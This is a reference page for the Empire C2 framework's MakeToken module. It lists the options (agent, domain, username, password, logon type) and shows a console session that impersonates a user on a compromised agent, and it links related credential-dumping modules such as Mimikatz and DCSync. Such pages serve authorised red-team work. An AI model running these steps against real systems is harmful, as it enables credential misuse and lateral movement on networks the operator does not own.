MakeToken - Empire Module

This page contains detailed information about how to use the csharp/Sharpsploit.Credentials/MakeToken Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: MakeToken
Module: csharp/Sharpsploit.Credentials/MakeToken
Source code: empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L1
Language: C#
Needs admin: No
OPSEC safe: No
Background: No

The MakeToken module makes a new token with a specified username and password, and impersonates it to conduct future actions as the specified user.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the MakeToken module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the MakeToken module:

Agent
Agent to run module on.

Domain
Domain to authenticate the user to.
Default value: DOMAIN.

DotNetVersion
.NET version to compile against.
Default value: Net35.
Suggested values: Net35, Net40.

Password
Password to authenticate the user.
Default value: Password123.

Username
Username to authenticate as.
Default value: username1.

Additional Module Options

---

This is a list of additional options that are supported by the MakeToken module:

LogonType
LogonType to use. Defaults to LOGON32_LOGON_NEW_CREDENTIALS, which is suitable to perform actions that require remote authentication. LOGON32_LOGON_INTERACTIVE is suitable for local actions.
Default value: LOGON32_LOGON_NEW_CREDENTIALS.

MakeToken Example Usage

---

Here's an example of how to use the MakeToken module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/Sharpsploit.Credentials/MakeToken

 Author       cobbr_io                                                         
 Background   False                                                            
 Description  Makes a new token with a specified username and password, and    
              impersonates it to conduct future actions as the specified user. 
 Language     csharp                                                           
 Name         csharp/Sharpsploit.Credentials/MakeToken                         
 NeedsAdmin   False                                                            
 OpsecSafe    False                                                            


,Record Options-,-------------------------------,----------,-------------------------------------,
| Name          | Value                         | Required | Description                         |
|---------------|-------------------------------|----------|-------------------------------------|
| Agent         |                               | True     | Agent to run module on.             |
|---------------|-------------------------------|----------|-------------------------------------|
| Domain        | DOMAIN                        | True     | Domain to authenticate the user to. |
|---------------|-------------------------------|----------|-------------------------------------|
| DotNetVersion | Net35                         | True     | .NET version to compile against     |
|---------------|-------------------------------|----------|-------------------------------------|
| LogonType     | LOGON32_LOGON_NEW_CREDENTIALS | False    | LogonType to use. Defaults to       |
|               |                               |          | LOGON32_LOGON_NEW_CREDENTIALS,      |
|               |                               |          | which is suitable to perform        |
|               |                               |          | actions that require remote         |
|               |                               |          | authentication.                     |
|               |                               |          | LOGON32_LOGON_INTERACTIVE is        |
|               |                               |          | suitable for local actions.         |
|---------------|-------------------------------|----------|-------------------------------------|
| Password      | Password123                   | True     | Password to authenticate the user.  |
|---------------|-------------------------------|----------|-------------------------------------|
| Username      | username1                     | True     | Username to authenticate as.        |
'---------------'-------------------------------'----------'-------------------------------------'

(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > set Domain DOMAIN
[*] Set Domain to DOMAIN
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > set Password Password123
[*] Set Password to Password123
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > set Username username1
[*] Set Username to username1
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > execute
[!] Error: csharpserver plugin not running

Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:

(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > useplugin csharpserver

,Record Options--,----------,----------------------------------,
| Name   | Value | Required | Description                      |
|--------|-------|----------|----------------------------------|
| status | start | True     | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'

(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/Sharpsploit.Credentials/MakeToken) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• cobbr_io

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L1
• https://twitter.com/cobbr_io

See Also

---

Check also the following modules related to this module:

• csharp/Sharpsploit.Credentials/GetSystem
• csharp/Sharpsploit.Credentials/ImpersonateProcess
• csharp/Sharpsploit.Credentials/ImpersonateUser
• csharp/Sharpsploit.Credentials/BypassUACGrunt
• csharp/Sharpsploit.Credentials/BypassUACCommand
• csharp/Sharpsploit.Credentials/RevertToSelf
• csharp/Sharpsploit.Credentials/LogonPasswords
• csharp/Sharpsploit.Credentials/LsaSecrets
• csharp/Sharpsploit.Credentials/LsaCache
• csharp/Sharpsploit.Credentials/SamDump
• csharp/Sharpsploit.Credentials/Wdigest
• csharp/Sharpsploit.Credentials/DCSync
• csharp/Sharpsploit.Credentials/Mimikatz
• csharp/Sharpsploit.Credentials/SafetyKatz

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.